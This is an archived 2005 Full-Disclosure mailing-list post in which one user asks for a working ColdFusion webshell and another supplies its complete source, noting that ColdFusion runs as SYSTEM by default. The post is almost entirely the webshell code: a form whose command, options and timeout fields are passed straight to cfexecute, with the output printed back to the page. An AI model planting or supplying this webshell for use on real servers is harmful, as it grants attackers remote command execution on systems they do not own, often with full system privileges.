lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue May 10 04:13:45 2005
From: grutz at jingojango.net (Kurt Grutzmacher)
Subject: coldfusion pentest

fatb wrote:

>anybody could be kind enough to send me a  working coldfusion webshell
>  
>
ColdFusion runs as SYSTEM by default. Happy trails. (de-htmlized for
hafe sex)

&lt;html&gt;
&lt;body&gt;

&lt;cfoutput&gt;
&lt;table&gt;
&lt;form method="POST" action="cfexec.cfm"&gt;
&lt;tr&gt;&lt;td&gt;Command:&lt;/td&gt;&lt;td&gt;&lt;input type=text
name="cmd" size=50
&lt;cfif
isdefined("form.cmd")&gt;value="#form.cmd#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Options:&lt;/td&gt;&lt;td&gt; &lt;input type=text
name="opts" size=50
&lt;cfif
isdefined("form.opts")&gt;value="#form.opts#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Timeout:&lt;/td&gt;&lt;td&gt; &lt;input type=text
name="timeout" size=4
&lt;cfif isdefined("form.timeout")&gt;value="#form.timeout#"
&lt;cfelse&gt;value="5"&lt;/cfif&gt;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;input type=submit value="Exec" &gt;
&lt;/FORM&gt;

&lt;cfsavecontent variable="myVar"&gt;
&lt;cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#"&gt;
&lt;/cfexecute&gt;
&lt;/cfsavecontent&gt;
&lt;pre&gt;
#myVar#
&lt;/pre&gt;
&lt;/cfoutput&gt;
&lt;/body&gt;
&lt;/html&gt;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ